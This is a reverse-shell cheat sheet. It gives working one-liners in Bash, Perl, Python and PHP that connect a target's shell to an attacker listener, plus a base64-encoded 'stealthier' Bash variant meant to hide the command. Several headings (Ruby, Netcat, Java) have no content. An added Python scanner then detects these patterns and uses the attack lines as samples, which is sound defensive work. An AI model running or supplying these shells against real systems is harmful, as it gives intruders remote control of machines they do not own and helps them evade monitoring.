Alternate Reverse Shells

Many times a netcat reverse shell is not possible because the tool is not installed on the target system. In such cases it is better to use another scripting language or tool already present on the system to initiate the reverse shell. Here are reverse shell commands using various technologies.

Note: a netcat listener must be started on your own system before any of the following commands are executed. These examples assume netcat is listening on IP 192.168.1.10 and port 80.

Bash
bash -i >& /dev/tcp/192.168.1.10/80 0>&1
Stealthier Method

# Base64-encode the command on your own machine:

echo "bash -c 'bash -i >& /dev/tcp/192.168.45.2/443 0>&1'" | base64 -w0

# Paste the output into the decode pipeline on the victim machine. The encoded
# string below is a separate example (run it through `base64 -d` to see which
# listener it names); substitute the output of your own encode step:

echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null

Perl
perl -e 'use Socket;$i="192.168.1.10";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.10",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
php -r '$sock=fsockopen("192.168.1.10",80);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby

Netcat

I am including netcat as well for easy reference:

If the client has the wrong version of netcat, the following command may come in handy, as pointed out by Jeff Price:

Java
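From the defender's side, all of the one-liners above share the same shape: a shell whose standard streams are wired to an outbound socket, sometimes wrapped in base64 so the plain command never appears in the process list. The following Python scanner is an added example and is not part of the original cheat sheet. It takes process command lines (constructed samples here, assumed to come from auditd, EDR or shell-history telemetry), decodes any `echo <base64> | base64 -d` pipeline first, then matches the Bash, Python, Perl and PHP patterns shown on this page and extracts the listener address for the alert. The indicator names and sample lines are this example's own.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"

# Behavioural indicators shared by the one-liners on this page, written as a
# defender would: a shell whose stdin/stdout/stderr point at a network socket.
INDICATORS = {
    "bash_dev_tcp_redirect": re.compile(r"/dev/(?:tcp|udp)/" + IPV4 + r"/\d+"),
    "python_socket_dup2": re.compile(r"socket\.socket\(.*?os\.dup2\(", re.S),
    "perl_socket_exec": re.compile(r"use Socket;.*?connect\(.*?exec\(", re.S),
    "php_fsockopen_exec": re.compile(
        r"fsockopen\(.*?\b(?:exec|shell_exec|system|passthru|popen)\(", re.S),
    # "/bin/sh -i" as well as the argv form '"/bin/sh","-i"' used by the Python variant
    "interactive_shell": re.compile(r"/bin/(?:ba)?sh[\"', ]+-i\b"),
}

# Where each variant names its listener, so the alert can carry the destination.
LISTENER_PATTERNS = [
    re.compile(r"/dev/(?:tcp|udp)/" + IPV4 + r"/(\d+)"),            # bash
    re.compile(r'connect\(\(\s*"' + IPV4 + r'"\s*,\s*(\d+)\s*\)\)'),   # python
    re.compile(r'fsockopen\(\s*"' + IPV4 + r'"\s*,\s*(\d+)'),        # php
    re.compile(r'\$i="' + IPV4 + r'";\s*\$p=(\d+)'),                 # perl
]

# `echo <base64> | base64 -d | <shell>`: the payload has to be decoded before
# the indicators above can see it.
B64_PIPE = re.compile(r"echo\s+([A-Za-z0-9+/=]{16,})\s*\|\s*base64\s+(?:-d|--decode)")


def decode_embedded_base64(cmdline: str) -> List[str]:
    """Return the decoded payloads of every `echo <b64> | base64 -d` pipeline in cmdline."""
    payloads = []
    for m in B64_PIPE.finditer(cmdline):
        try:
            payloads.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue  # not valid base64: the plain-text regexes still get a look at it
    return payloads


def find_listener(text: str) -> Optional[Tuple[str, int]]:
    """Pull (ip, port) out of whichever variant is present, or None."""
    for pat in LISTENER_PATTERNS:
        m = pat.search(text)
        if m:
            return m.group(1), int(m.group(2))
    return None


def scan_cmdline(cmdline: str) -> Dict[str, object]:
    """Score one process command line: matched indicators, listener, and whether
    a base64 payload had to be unwrapped to find them."""
    payloads = decode_embedded_base64(cmdline)
    text = "\n".join([cmdline] + payloads)
    hits = [name for name, pat in INDICATORS.items() if pat.search(text)]
    return {
        "suspicious": bool(hits),
        "indicators": hits,
        "listener": find_listener(text),
        "decoded_payload": bool(payloads),
    }


def scan_all(cmdlines: List[str]) -> List[Dict[str, object]]:
    return [scan_cmdline(c) for c in cmdlines]


# Constructed sample telemetry (not real captures): the page's Bash and Python
# variants, a base64-wrapped Bash variant built here, and two benign lines, one
# of which also pipes base64 into a decoder so the decode alone does not alert.
_ENCODED = base64.b64encode(b"bash -c 'bash -i >& /dev/tcp/192.168.1.10/80 0>&1'").decode()
_BENIGN_B64 = base64.b64encode(b"hello world, this is fine").decode()
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/192.168.1.10/80 0>&1",
    "echo " + _ENCODED + " | base64 -d | bash 2>/dev/null",
    """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.10",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""",
    "tar czf /tmp/backup.tgz /var/www",
    "echo " + _BENIGN_B64 + " | base64 -d",
]

if __name__ == "__main__":
    for line, result in zip(SAMPLE_CMDLINES, scan_all(SAMPLE_CMDLINES)):
        flag = "ALERT" if result["suspicious"] else "ok   "
        print(f"{flag} indicators={result['indicators']} listener={result['listener']} :: {line[:60]}")
```

The regexes are deliberately keyed on behaviour (socket plus shell, or the `/dev/tcp` redirect) rather than on exact strings, so trivial re-spacing or renaming variables does not evade them; decoding the base64 wrapper first is what makes the "stealthier" variant show up as the same indicator as the plain one.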

Other Resources

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python
